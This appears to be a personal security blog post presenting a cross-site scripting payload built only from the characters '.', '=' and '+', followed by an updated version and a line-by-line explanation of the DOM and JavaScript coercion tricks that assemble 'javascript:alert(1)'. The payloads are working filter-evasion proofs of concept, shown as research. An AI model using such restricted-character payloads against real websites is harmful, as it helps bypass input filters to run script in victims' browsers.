Physuru's Blog

Restricted-character XSS for fun

I have created an XSS payload which:

In fact, the only special characters it uses are ., =, and + (aside from \n and such). In this blog post, I provide the payload and explain how it works.

The payload

amp=new Object
amp.valueOf=String.prototype.bold
document.body.innerHTML=amp+0
amp=document.body.firstElementChild
amp.innerText=document.body.innerHTML
amp.className=amp.innerHTML
amp.classList.valueOf=String.prototype.charAt
amp=amp.classList

location.hash=97
document.body.innerHTML=amp+location.hash
a=document.body.innerText
location.hash=99
document.body.innerHTML=amp+location.hash
c=document.body.innerText
location.hash=105
document.body.innerHTML=amp+location.hash
i=document.body.innerText
location.hash=106
document.body.innerHTML=amp+location.hash
j=document.body.innerText
location.hash=112
document.body.innerHTML=amp+location.hash
p=document.body.innerText
location.hash=114
document.body.innerHTML=amp+location.hash
r=document.body.innerText
location.hash=115
document.body.innerHTML=amp+location.hash
s=document.body.innerText
location.hash=116
document.body.innerHTML=amp+location.hash
t=document.body.innerText
location.hash=118
document.body.innerHTML=amp+location.hash
v=document.body.innerText

location.hash=58
document.body.innerHTML=amp+location.hash
colon=document.body.innerText

location.hash=40
document.body.innerHTML=amp+location.hash
lpar=document.body.innerText
location.hash=41
document.body.innerHTML=amp+location.hash
rpar=document.body.innerText

location=j+a+v+a+s+c+r+i+p+t+colon+alert.name+lpar+1+rpar

The explanation

amp=new Object creates the variable amp and assigns a new instance of Object to it.
The following line assigns String.prototype.bold to amp.valueOf. valueOf is a function which is called to convert an object to a primitive type (such as a string). On the next line I wrote amp+0, which implicitly calls amp.valueOf, which is now String.prototype.bold with amp as this. String.prototype.bold is a simple function which returns the input (this) string wrapped in <b> and </b>. If the input to bold is not a string (in this case, it's an object), bold first converts it to a string via its toString function. So, amp+0 yields <b>[object Object]</b>0, which is assigned to document.body.innerHTML.
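The valueOf step is plain JavaScript, so it can be tried outside the browser. A minimal sketch (the names boldObj and html are only for illustration and are not part of the payload):

```javascript
// A plain object whose valueOf is replaced by String.prototype.bold.
const boldObj = new Object;
boldObj.valueOf = String.prototype.bold;

// The + operator converts boldObj to a primitive by calling boldObj.valueOf().
// bold() runs with `this` set to boldObj, stringifies it via toString,
// and wraps the result in <b>...</b>.
const html = boldObj + 0;

console.log(html); // <b>[object Object]</b>0
```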
The next line assigns the <b> element (the body's first element child) to amp.
The next line assigns document.body.innerHTML to amp.innerText, which means that amp's literal text content will be <b>[object Object]</b>0. After the innerText assignment, amp's innerHTML is equal to &lt;b&gt;[object Object]&lt;/b&gt;0. That's important, because the ampersand at the beginning of that string is almost re-usable, and the ampersand is crucial to my approach of getting other usable characters. I say "almost" because, for it to be re-usable in any meaningful way, I need to get the ampersand alone, without the trailing characters.
To separate the ampersand, I obviously could not do amp.innerHTML[0] in this context, as that would violate the rule which prohibits the use of [ and ]. Instead, I abused DOM element classes and String.prototype.charAt. className is a representation of an element's classes as one contiguous string. classList is another representation of the same data, but as a DOMTokenList which contains strings. (toString, when called on a DOMTokenList, returns a meaningful string representation of the DOMTokenList's value/content.) charAt is a function which returns the character at the n-th index of the target (this), where n is 0 by default; if the target is not a string originally, it is converted to a string via its toString function. As amp.innerHTML was assigned to className, the first character in the string resulting from converting classList to a string will be &. Therefore, calling charAt on the classList (via valueOf) will result in a single ampersand.
In the next two lines, String.prototype.charAt is assigned to amp.classList.valueOf, then amp.classList is assigned to amp (meaning that amp will effectively be an ampersand in upcoming concatenations). Note: valueOf is not implicitly called on strings (a string is already a primitive, so no conversion takes place), which is why I set valueOf on classList rather than className.
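The charAt step can be approximated without a DOM. In this sketch, fakeClassList is a hypothetical stand-in for the real DOMTokenList: an ordinary object whose toString returns the class string, which is all the trick relies on.

```javascript
// Stand-in for amp.classList: an object whose toString returns the class string.
// (A real DOMTokenList stringifies to the element's class attribute value.)
const fakeClassList = {
  toString() {
    return "&lt;b&gt;[object Object]&lt;/b&gt;0";
  },
};
fakeClassList.valueOf = String.prototype.charAt;

// The + operator calls valueOf, i.e. charAt with no argument, which
// stringifies the object and returns the character at index 0.
const entityStart = fakeClassList + "#58";

console.log(entityStart); // &#58
```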

The next section uses location.hash and innerHTML to create a lot of re-usable characters.
For example, to create a colon, 58 is assigned to location.hash. 58 is the colon's Unicode codepoint in base 10 (not hexadecimal). Reading location.hash back yields #58, because the browser prepends the # to the fragment. Then, amp+location.hash is assigned to document.body.innerHTML. For the colon section, amp+location.hash results in &#58, which is an acceptable numeric character reference for the colon (according to the spec, there should be a semicolon directly after the numeric part, but it works without one). The HTML parser replaces the &#58 with a colon so, in the next line, document.body.innerText is assigned to colon (which makes colon a string containing a single colon).
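The string handling in this step can be sketched outside the browser. Here the global URL class stands in for location (an assumption for illustration), and String.fromCodePoint only shows which character the HTML parser would produce; it is not how the payload decodes anything.

```javascript
// URL stands in for window.location; the payload itself uses location.hash.
const pageUrl = new URL("https://example.com/");
pageUrl.hash = 58;                 // the number is coerced to the string "58"
const fragment = pageUrl.hash;     // "#58": the getter prepends the "#"

// "&" plus the fragment forms a numeric character reference without ";".
const reference = "&" + fragment;

// An HTML parser would replace the reference with the character whose
// code point is 58. fromCodePoint shows which character that is.
const decoded = String.fromCodePoint(Number(fragment.slice(1)));

console.log(reference, decoded); // &#58 :
```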

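The last line of my payload builds the string "javascript:alert(1)" (alert.name supplies the text "alert" without needing quotes, and the number 1 is converted to a string by the concatenation), then assigns it to location.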
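To check that the chosen code points really spell out the target string, the final concatenation can be reproduced in isolation. This is only a verification sketch: String.fromCodePoint replaces the innerHTML round trip, and the empty alert function is a stand-in for the browser's built-in.

```javascript
// Code points used by the payload, in the order the final line concatenates them.
const schemeCodes = [106, 97, 118, 97, 115, 99, 114, 105, 112, 116]; // j a v a s c r i p t
const scheme = schemeCodes.map((code) => String.fromCodePoint(code)).join("");

const colon = String.fromCodePoint(58);
const lpar = String.fromCodePoint(40);
const rpar = String.fromCodePoint(41);

// Stand-in for the browser's alert: a function's name property is its identifier.
function alert() {}

// Same shape as the payload's last line, minus the assignment to location.
const target = scheme + colon + alert.name + lpar + 1 + rpar;

console.log(target); // javascript:alert(1)
```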

Update

I've improved my payload so that it no longer assigns to location.hash or to document.body.innerHTML.

elem=new Option
elem.classList.valueOf=String.prototype.charAt

elem.innerText=elem.outerHTML
elem.className=elem.innerHTML
amp=elem.classList+new String

htag=new Text
elem.className=htag.nodeName
htag=elem.classList+new String

elem.innerHTML=amp+htag+97
a=elem.innerText
elem.innerHTML=amp+htag+99
c=elem.innerText
elem.innerHTML=amp+htag+105
i=elem.innerText
elem.innerHTML=amp+htag+106
j=elem.innerText
elem.innerHTML=amp+htag+112
p=elem.innerText
elem.innerHTML=amp+htag+114
r=elem.innerText
elem.innerHTML=amp+htag+115
s=elem.innerText
elem.innerHTML=amp+htag+116
t=elem.innerText
elem.innerHTML=amp+htag+118
v=elem.innerText

elem.innerHTML=amp+htag+58
colon=elem.innerText

elem.innerHTML=amp+htag+40
lpar=elem.innerText
elem.innerHTML=amp+htag+41
rpar=elem.innerText

location=j+a+v+a+s+c+r+i+p+t+colon+alert.name+lpar+1+rpar
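
The updated payload comes without a walkthrough, so what follows is only one plausible reading of it. new Text creates a text node whose nodeName is "#text", so passing that string through className and charAt yields the # that location.hash used to supply. Adding new String (an empty String object) appears to be there to convert classList to a primitive string immediately, before className is overwritten again. The sketch below imitates this with a hypothetical stand-in object instead of a real DOMTokenList:

```javascript
// Stand-in for elem.classList after elem.className = htag.nodeName.
// In a browser, (new Text).nodeName is "#text".
const classListStandIn = {
  value: "#text",
  toString() {
    return this.value;
  },
};
classListStandIn.valueOf = String.prototype.charAt;

// new String is an empty String object; adding it converts the stand-in
// to a primitive string right away, capturing the current first character.
const hashChar = classListStandIn + new String;

// Changing the underlying class string later does not affect the captured copy.
classListStandIn.value = "something-else";

console.log(hashChar, typeof hashChar); // # string
```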